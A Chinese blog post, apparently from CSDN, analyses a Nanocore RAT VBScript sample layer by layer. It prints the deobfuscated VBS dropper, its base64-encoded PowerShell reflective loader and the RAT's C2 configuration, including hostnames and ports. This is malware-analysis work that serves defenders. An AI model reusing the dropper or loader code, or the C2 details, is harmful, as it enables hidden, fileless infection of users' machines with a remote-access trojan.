Nanocore恶意脚本分析

于 2024-09-13 10:44:59 发布
阅读量879 收藏 31
点赞数 25
分类专栏: 技术分享 文章标签: 样本分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41596969/article/details/142204470
版权

Nanocore恶意脚本分析

前言

最近在外网发现一个有意思的Nanocore恶意脚本的样本,给大家分享一下

SHA256: c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1

Sharelink: https://virusshare.com/file?2596ef126fb57cdf2ba563b05444ad0ec6dad6a0083b3c309ca9595e64ad0615

初步分析

在这里插入图片描述

源文件的大部分均为干扰用的字符串,直接正则替换提取出来,拿到核心代码

^(REM|').*

在这里插入图片描述

混淆技术分析

首先chr字符串可以很容易想到数值转换字符,我们用第一个混淆具体拆开分析一下

  • chr函数:数值转字符
  • 479808:十进制数值,用于参与后续的计算
  • CLng函数:vbs中的CLng 函数,用于把表达式转换为长整型(Long)类型
  • &H1B90:这是vbs中的十六进制写法,代表0x1B90
  • 以及其余的算术运算符

直接做计算得到:

在这里插入图片描述

同理第二个混淆:

在这里插入图片描述

通过python批量提取所有混淆后的payload

在这里插入图片描述

观察到payload中存在两种运算,提取出来表达式做进一步操作

for matcher in matchers:
    matcher = matcher.replace("&H", "0x")
    matcher = matcher.replace('chr(', '')
    matcher = matcher.replace(')', '')
    matcher = matcher.replace('CLng(', '')
    print(matcher)

在这里插入图片描述

完整代码

import re


# 读取文件
def read_text(filename):
    with open(filename, 'r') as f:
        return f.read()


# 计算payload
def calc(string):
    if "/" in string:
        return int(string.split("/")[0]) / int(string.split("/")[-1], 16)
    elif "+" in string:
        return int(string.split("+")[0]) + int(string.split("+")[-1], 16)


Nanocore_text = read_text('Nanocore.txt')
pattern = re.compile(r'chr\([^)]+\)\)')
matchers = pattern.findall(Nanocore_text)

code = ""
for matcher in matchers:
    matcher = matcher.replace("&H", "0x")
    matcher = matcher.replace('chr(', '')
    matcher = matcher.replace(')', '')
    matcher = matcher.replace('CLng(', '')
    matcher = calc(matcher)
    matcher = chr(int(matcher))
    code += matcher.replace('\n', '')

with open('Nanocore.vbs', 'w') as f:
    f.write(code)

成功提取到vbs源码

在这里插入图片描述

源码分析

源码:

Dim scriptPath, scriptFolder, sourcePath, destinationPath, scriptNameWithoutExtension
Dim fso, shell
Set fso = CreateObject("Scripting.FileSystemObject")

scriptPath = WScript.ScriptFullName
scriptFolder = fso.GetParentFolderName(scriptPath)
scriptNameWithoutExtension = fso.GetFileName(scriptPath)
destinationPath = scriptFolder & "\" & scriptNameWithoutExtension & ".exe"

Dim part1, part2, part3, part4, part5, part6, part7, part8, part9, part10, part11, part12, part13, fullPath
part1 = "%S" 
part2 = "ystem"  
part3 = "Root%" 
part4 = "\Sys"  
part5 = "WOW"  
part6 = "64"   
part7 = "\Windo" 
part8 = "wsPow" 
part9 = "erShell" 
part10 = "\v1."  
part11 = "0\pow" 
part12 = "ershe" 
part13 = "ll.exe"
fullPath = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13
Dim expandedPath
Set shell = CreateObject("WScript.Shell")
expandedPath = shell.ExpandEnvironmentStrings(fullPath)
sourcePath = expandedPath

Dim objWMIService, objProcess, strCommand
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
strCommand = "cmd /c copy """ & sourcePath & """ """ & destinationPath & """ /Y"
Set objProcess = objWMIService.Get("Win32_Process")
objProcess.Create strCommand
WScript.Sleep(1500)

Dim file
Set file = fso.GetFile(destinationPath)
file.Attributes = 4 + 2

Set objWMIService = Nothing
Set objProcess = Nothing
shell.Run destinationPath & " -enc JABDAHYAbwBrAGEAeQBrAHQAcAByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFoAegBuAGsAegB5AGYAbABnAGoAdwAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEMAdgBvAGsAYQB5AGsAdABwAHIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAQwBmAHgAegBpAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAWgB6AG4AawB6AHkAZgBsAGcAagB3AC4AUgBlAHAAbABhAGMAZQAoACcAUgBFAE0AIAAnACwAIAAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACAAJwBBACcAKQApADsAJABLAGMAeABwAHEAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAQwBmAHgAegBpAHMAIAApADsAJABHAGMAeQB3AGUAegB5AHAAZwBxACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABaAHEAdAB3AGcAbwBiAGoAeABkAHcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQASwBjAHgAcABxAHQALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAFoAcQB0AHcAZwBvAGIAagB4AGQAdwAuAEMAbwBwAHkAVABvACgAIAAkAEcAYwB5AHcAZQB6AHkAcABnAHEAIAApADsAJABaAHEAdAB3AGcAbwBiAGoAeABkAHcALgBDAGwAbwBzAGUAKAApADsAJABLAGMAeABwAHEAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEMAZgB4AHoAaQBzACAAPQAgACQARwBjAHkAdwBlAHoAeQBwAGcAcQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAQwBmAHgAegBpAHMAKQA7ACAAJABGAGgAegB4AHcAaQBoAHoAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEMAZgB4AHoAaQBzACkAOwAgACQAQQBkAGMAbwBqACAAPQAgACQARgBoAHoAeAB3AGkAaAB6AG4ALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAGQAYwBvAGoALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAZABjAG8AagAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=", 0, False

Set fso = Nothing
Set shell = Nothing

初始化

Dim scriptPath, scriptFolder, sourcePath, destinationPath, scriptNameWithoutExtension
Dim fso, shell
Set fso = CreateObject("Scripting.FileSystemObject")

首先定义了一系列变量用于后续操作,Fso通过创建一个FileSystemObject实例,FileSystemObject提供了丰富的文件系统操作功能,比如读取文件、创建目录、复制文件等。

获取当前脚本环境信息

scriptPath = WScript.ScriptFullName
scriptFolder = fso.GetParentFolderName(scriptPath)
scriptNameWithoutExtension = fso.GetFileName(scriptPath)
destinationPath = scriptFolder & "\" & scriptNameWithoutExtension & ".exe"
  • 脚本当前全路径
  • 脚本当前文件夹路径
  • 脚本文件名称(这里看名字是想要获取不带后缀的文件名,实际上仍然会获取vbs后缀)
  • 目标路径(exe后缀)

路径为:当前路径\脚本名称.exe

构造Shell路径

Dim part1, part2, part3, part4, part5, part6, part7, part8, part9, part10, part11, part12, part13, fullPath
part1 = "%S" 
part2 = "ystem"  
part3 = "Root%" 
part4 = "\Sys"  
part5 = "WOW"  
part6 = "64"   
part7 = "\Windo" 
part8 = "wsPow" 
part9 = "erShell" 
part10 = "\v1."  
part11 = "0\pow" 
part12 = "ershe" 
part13 = "ll.exe"
fullPath = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13

通过拼接的方式绕过特征检测,构造出shell路径(Powershell)

%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

补充Shell完整路径

Dim expandedPath
Set shell = CreateObject("WScript.Shell")
expandedPath = shell.ExpandEnvironmentStrings(fullPath)
sourcePath = expandedPath

首先创建了一个WScript.Shell对象,WScript.Shell对象提供了对Windows Shell的访问,可以执行诸如运行程序、操作环境变量等

然后通过Shell对象的ExpandEnvironmentStrings方法操作fullPath(存在环境变量占位符的Shell路径)

ExpandEnvironmentStrings方法会获取环境变量中的占位符信息并替换其代表的路径,此处为%System%,拼接后赋值给sourcePath

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

复制powershell

Dim objWMIService, objProcess, strCommand
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
strCommand = "cmd /c copy """ & sourcePath & """ """ & destinationPath & """ /Y"
Set objProcess = objWMIService.Get("Win32_Process")
objProcess.Create strCommand
WScript.Sleep(1500)

这一段的作用是通过wmi执行命令并延时,拼接后的命令为

cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "{当前路径\脚本名称.exe}" /Y

将powershll复制到了当前目录,并命名为脚本名称.exe(e.g. nanocore.vbs.exe)

赋予权限

Dim file
Set file = fso.GetFile(destinationPath)
file.Attributes = 4 + 2

通过之前获取到的fso对象操作上一步复制的powershell文件,设置属性为4+2(系统文件+隐藏)

执行powershell脚本

Set objWMIService = Nothing
Set objProcess = Nothing

shell.Run destinationPath & " -enc JABDAHYAbwBrAGEAeQBrAHQAcAByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFoAegBuAGsAegB5AGYAbABnAGoAdwAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEMAdgBvAGsAYQB5AGsAdABwAHIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAQwBmAHgAegBpAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAWgB6AG4AawB6AHkAZgBsAGcAagB3AC4AUgBlAHAAbABhAGMAZQAoACcAUgBFAE0AIAAnACwAIAAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACAAJwBBACcAKQApADsAJABLAGMAeABwAHEAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAQwBmAHgAegBpAHMAIAApADsAJABHAGMAeQB3AGUAegB5AHAAZwBxACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABaAHEAdAB3AGcAbwBiAGoAeABkAHcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQASwBjAHgAcABxAHQALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAFoAcQB0AHcAZwBvAGIAagB4AGQAdwAuAEMAbwBwAHkAVABvACgAIAAkAEcAYwB5AHcAZQB6AHkAcABnAHEAIAApADsAJABaAHEAdAB3AGcAbwBiAGoAeABkAHcALgBDAGwAbwBzAGUAKAApADsAJABLAGMAeABwAHEAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEMAZgB4AHoAaQBzACAAPQAgACQARwBjAHkAdwBlAHoAeQBwAGcAcQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAQwBmAHgAegBpAHMAKQA7ACAAJABGAGgAegB4AHcAaQBoAHoAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEMAZgB4AHoAaQBzACkAOwAgACQAQQBkAGMAbwBqACAAPQAgACQARgBoAHoAeAB3AGkAaAB6AG4ALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAGQAYwBvAGoALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAZABjAG8AagAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=", 0, False

Set fso = Nothing
Set shell = Nothing

前后清空了获取到的几个对象,重点为中间的部分,详细分析

powershell脚本详细分析

在这里插入图片描述

$Cvokayktpr = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName.Replace('.exe','');
$Zznkzyflgjw = get-content $Cvokayktpr | Select-Object -Last 1;
$Cfxzis = [System.Convert]::FromBase64String($Zznkzyflgjw.Replace('REM ', '').Replace('@', 'A'));
$Kcxpqt = New-Object System.IO.MemoryStream( , $Cfxzis );
$Gcywezypgq = New-Object System.IO.MemoryStream;
$Zqtwgobjxdw = New-Object System.IO.Compression.GzipStream $Kcxpqt, ([IO.Compression.CompressionMode]::Decompress);
$Zqtwgobjxdw.CopyTo( $Gcywezypgq );
$Zqtwgobjxdw.Close();
$Kcxpqt.Close();
[byte[]] $Cfxzis = $Gcywezypgq.ToArray();
[Array]::Reverse($Cfxzis);
$Fhzxwihzn = [System.AppDomain]::CurrentDomain.Load($Cfxzis);
$Adcoj = $Fhzxwihzn.EntryPoint;
[System.Delegate]::CreateDelegate([Action], $Adcoj.DeclaringType, $Adcoj.Name).DynamicInvoke() | Out-Null

我们详细跟进一下(以我的环境为例)

  • 获取当前运行的 PowerShell 进程的主模块(即主执行文件)的完整路径,并去除exe后缀
$Cvokayktpr = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName.Replace('.exe','');

还记得复制powershell文件那一步吗,实际上在这里获取到的主进程名为脚本名称.exe,那么最终拿到的文件路径就变回了脚本文件本身的路径

在这里插入图片描述

在这里插入图片描述

  • 获取脚本的最后一行内容并做第二次相关的解混淆操作
$Zznkzyflgjw = get-content $Cvokayktpr | Select-Object -Last 1;
$Cfxzis = [System.Convert]::FromBase64String($Zznkzyflgjw.Replace('REM ', '').Replace('@', 'A'));

即:

①去除开头REM

②替换@为A

③base64解码

在这里插入图片描述

在这里插入图片描述

识别出来是gz格式数据,内容我们稍后分析

  • 通过New-Object创建了两个System.IO.MemoryStream对象
$Kcxpqt = New-Object System.IO.MemoryStream( , $Cfxzis );
$Gcywezypgq = New-Object System.IO.MemoryStream;

New-Object: 是 PowerShell 中的一个命令,用于创建 .NET Framework 对象的实例,这里两个参数代表向开始位置写入数据

System.IO.MemoryStream: 是 .NET Framework 中的一个类,用于在内存中读写数据

可以看到这里实现了无文件落地操作,并且向第一个对象中写入了上一步解出来的数据

  • 解压缩内存中的gz数据
$Zqtwgobjxdw = New-Object System.IO.Compression.GzipStream $Kcxpqt, ([IO.Compression.CompressionMode]::Decompress);

System.IO.Compression.GzipStream: 是 .NET Framework 中的一个类,用于处理 GZIP 格式的压缩和解压缩数据流。

[IO.Compression.CompressionMode] 是 .NET Framework 中的一个枚举,用于指定 GzipStream 的压缩或解压缩模式。

这里对刚刚的gz数据进行了解压缩,我们现在来看一下解压缩后的数据

在这里插入图片描述

看上去无意义,但当我们翻到最后发现了这个,来看看后续会怎么处理

  • 加载解压缩后的数据为字节数组
$Zqtwgobjxdw.CopyTo( $Gcywezypgq );
$Zqtwgobjxdw.Close();
$Kcxpqt.Close();
[byte[]] $Cfxzis = $Gcywezypgq.ToArray();

这里将解压缩后的数据复制到了之前创建的另一个内存流对象中,并转换为了字节数组

  • 反转并作为.NET应用程序集加载
[Array]::Reverse($Cfxzis);
$Fhzxwihzn = [System.AppDomain]::CurrentDomain.Load($Cfxzis);

[System.AppDomain]::CurrentDomain:获取当前应用程序域(AppDomain)的实例

.Load() 方法:是 System.AppDomain 类的一个方法,用于加载指定的.NET应用程序集。

在这里插入图片描述

  • 动态调用方法
[System.Delegate]::CreateDelegate([Action], $Adcoj.DeclaringType, $Adcoj.Name).DynamicInvoke() | Out-Null

[System.Delegate]::CreateDelegate可以创建一个委托,该委托封装了指定的方法,通常用于动态地调用方法

第一个参数 [Action] 指定了委托的类型。Action 是一个没有返回值的委托类型,可以接受最多16个参数

第二个参数 $Adcoj.DeclaringType 是包含方法的类型(即类的 Type 对象)。

第三个参数 $Adcoj.Name 是要封装的方法的名称。

.DynamicInvoke()直接动态调用方法,并通过管道传递给Out-Null丢弃输出

内存加载的可执行文件分析

现在我们回过头来分析中途内存加载的可执行文件

在这里插入图片描述

还伪造了pdf图标

在这里插入图片描述

丢进vt直接发现Nanocore RAT特征

在这里插入图片描述

{'NanoCore': {'KeyboardLogging': ['True'], 'BuildTime': ['2024-08-08 05:36:51.971568'], 'Version': ['1.2.2.0'], 'Mutex': ['5a71ca6b-558e-46f1-b51d-f5c300aa04cd'], 'DefaultGroup': ['D-Online23rd'], 'PrimaryConnectionHost': ['builderlloulirabaonline23rd.mywire.org'], 'BackupConnectionHost': ['127.0.0.1'], 'ConnectionPort': ['7077'], 'RunOnStartup': ['False'], 'RequestElevation': ['False'], 'BypassUserAccountControl': ['False'], 'ClearZoneIdentifier': ['True'], 'ClearAccessControl': ['False'], 'SetCriticalProcess': ['False'], 'PreventSystemSleep': ['True'], 'ActivateAwayMode': ['False'], 'EnableDebugMode': ['False'], 'RunDelay': ['0'], 'ConnectDelay': ['4000'], 'RestartDelay': ['5000'], 'TimeoutInterval': ['5000'], 'KeepAliveTimeout': ['30000'], 'MutexTimeout': ['5000'], 'LanTimeout': ['2500'], 'WanTimeout': ['8000'], 'BufferSize': ['65535'], 'MaxPacketSize': ['10485760'], 'GCThreshold': ['10485760'], 'UseCustomDnsServer': ['True'], 'PrimaryDnsServer': ['8.8.8.8'], 'BackupDnsServer': ['8.8.4.4'], 'cncs': [['builderlloulirabaonline23rd.mywire.org:7077', '127.0.0.1:7077']]}}

{'XWorm': {'C2': ['reserved2021whsjsr.mywire.org'], 'Port': ['7100\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c'], 'AES Key (connections)': ['<123456789>'], 'SPL': ['<Xwormmm>'], 'USBNM': ['XWorm V5.6']}}

总结

经过前面分析可以看到,该样本一共套了四层

  • 第一层vbs
  • 第二层vbs
  • 第三层powershell
  • 第四层Nanocore RAT

每一层之间互相配合最终以无文件落地的形式执行了C2文件,中间还是有挺多值得借鉴的地方

Y5neKO
关注
专栏目录
生信分析服务器配置脚本
08-13
生信分析linux环境配置,安装分析软件环境,需要root权限
脚本恶意程序分析技巧汇总1
08-03
恶意代码分析中,了解不同类型的文件分析技巧至关重要。这篇汇总主要关注Python和VBScript样本分析,以及宏病毒和PowerShell病毒的处理方法。以下是对这些知识点的详细阐述: **Python样本分析** 1. **Python...
假设分析Python脚本
04-17
假设分析使用T段和p段的算法编写的小脚本,该脚本支持CSV数据传入,或者手动设置均值STD值等方法进行计算,效果较为粗糙,但是学习价值很大。
PE分析脚本python
03-18
5. **节内容分析**:脚本可能还会解析节的实际内容,例如检查代码区是否有特定的指令序列,或者查找数据区的特定模式,这对于安全分析恶意软件检测非常重要。 6. **异常处理与线程信息**:PE文件中还包含异常处理...
API获取Bilibili用户数据
热门推荐
Y5neKO's blog
10-16 2万+
熟悉我的朋友都知道,我呢在B站发展着一个号,因为没有技术的原因,目前还有很多作品为转载,现在发展得还算有了个人样,每天又看着野生技术协会的大佬发了那么多的文章,心里想着自己好歹也整一点技术相关的活吧。 说干就干,今天硬是宅在家分析了一下午关于B站API相关的东西。 开发者工具找API 先来到B站主页或者自己的个人主页,记得登录状态 这里拿我的做演示(顺便安利一波) 我的个人主页:https://space.bilibili.com/35199034 F12打开开发者工具,可以看到众多的请求: 我们在其中
QQ通过xml卡片自动探测对方ip
Y5neKO's blog
10-16 1万+
鸽了这么久,终于来写这篇文章了,话说回来,这个方法是一个月前就开始用的了,现在才来写,因为我懒嘛,绝对不是因为我懒哈,是因为之前的方法一直不适合绝大多数用户,今天才发现了每个人都能用的方法。 起因是这样的,某一天我像往常一样刷着qq,突然在之前加的一个qq机器人群发现一个机器人发出这样一张卡片:谁在窥屏。我心想难不成你还真能知道我在窥屏?几秒钟后我傻眼了,该机器人返回了几个ip和浏览器ua信息,其中我的ip和手机型号赫然出现在我的眼前,难以置信,愣了半天后,心里立马冒出了好奇的想法,今天必须把这个原理搞明白
百一测评网站切屏检测绕过
Y5neKO's blog
12-25 9520
事情是这样的,这几天不是临近期末嘛,老师都开始划重点,准备在线考试的老师也在开始测试线上考试了,今天人工智能在百一测评发下来一套测试,想点进去看看能不能粘贴,结果刚出去百度,就弹出离开页面警告,这谁顶得住,人工智能一点都不会岂不是就要挂科了,只能动动信安专业头脑想想办法了! 说是破解,其实也就是想办法把防切屏解了。 之前有些考试软件防止切屏可以用虚拟机,稍微复杂一点,至于浏览器检测切屏,无非就是检测焦点,像有些网站的动态标题就是这样,那么用什么来实现检测焦点呢?这里不得不提到JavaScript。 众.
哈希传递攻击/黄金白银票据
Y5neKO's blog
09-17 1930
Q&A Q1:pth在什么情况下能成功、哈希传递受到什么限制、什么情况下不能传递? A1:①pth在获取到目标机器中RID为500的内置管理员账户或在目标机器本地管理员组的域成员账户的hash值的情况下能成功;②哈希传递会受到目标系统上的UAC的限制,如果不是RID=500的内置账户则不会以完全管理员权限登录系统;③若目标系统完全禁止了所有用户的远程登录权限(包括RID为500的内置管理员),则无法进行传递。 Q2:安装补丁KB2871997后影响 A2:见文章中KB2871997补丁 -->
服务器开启谷歌BBR加速网络
Y5neKO's blog
10-16 1453
老朋友都知道,之前的旧博客是用Wordpress搭建的,出于各种原因导致加载比较慢,再加上受到了大佬们的安利,所以改用了现在的Typecho,整站访问速度看起来还不错,但是某些地方还是有些瑕疵,所以在那之后我就一直在找能够有效加速网站访问速度的方法,然后在今天找到了谷歌BBR拥塞控制算法,开始着手配置。 注:本文部分内容引用于其他博客 0x00 概念 传统 TCP 拥塞控制算法,基于 丢包反馈 的协议。 基于「丢包反馈」的协议是一种 被动式 的拥塞控制机制,其依据网络中的 丢包事件 来做网络拥塞判断。即便网
通过B站API在网站中添加一段统计粉丝量代码
Y5neKO's blog
10-16 939
前几天写了一篇关于B站的api有关的文章,本来打算弄清了api就去整一整爬虫,结果一看了文章直接选择放弃,弄大数据爬虫爬整个B站数据太过于高深,小人才浅完全不能通读… 今天注意到我当前用的这个主题(来自Xingr大佬),其中主页的来访人数统计代码因为被我乱改而破坏了,一直显示为0,总让它摆在那里不美观,直接删掉更不美观。正好想到前天研究的B站api,干脆做个粉丝量统计代码,说干就干。 整合一下前面文章摘要,B站的粉丝人数相关的api请求地址为: https://api.bilibili.com/x/rela
javaweb项目进销存管理系统springboot+vue+redis idea导入 mysql数据库-java课程设计毕业设
10-18
该系统采用Spring Boot作为后端框架,Vue.js作为前端技术,集成Redis进行缓存管理,并使用MySQL数据库进行数据存储。此项目旨在为在校大学生的Java课程设计和毕业设计提供全面的学习参考与实践指导,同时为Java技术爱好者提供丰富的学习资料。帮助用户深入理解进销存管理系统的设计思路与实现方法。通过该源码,开发者可以掌握Spring Boot、Vue.js、Redis和MySQL的结合使用,提升全栈开发能力,是学习Java开发的重要实践材料,适合于进行个人项目或课程作业参考。
毕业设计论文SpringBoot助学兼职系统.docx
10-18
毕业设计论文
毕业设计论文SpringBoot智能菜谱推荐系统.docx
10-18
毕业设计论文
毕业设计论文SSM创新型产品提前购平台.docx
10-18
毕业设计论文
大语言模型微调,Qwen2和GLM4指令微调-LLM Finetune.zip
10-18
大语言模型微调,Qwen2和GLM4指令微调-LLM Finetune
3 GH7用(RH8字体大小显示不正常) 模型内套图框.gh
最新发布
10-18
3 GH7用(RH8字体大小显示不正常) 模型内套图框.gh
MySQL8.0与5.7版本的下载、安装与配置详细视频教程,自己买的培训机构的课,5积分分享!
10-18
mysql安装教程
基于判断矩阵法的网页恶意脚本检测与统计分析
针对网页安全领域中的挑战,研究人员提出了一种创新的检测策略,即通过深入分析网页中的恶意脚本,采用统计方法作为基础手段来识别潜在威胁。传统的恶意脚本可能经过encode和unescape等加密处理,使得检测变得复杂。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值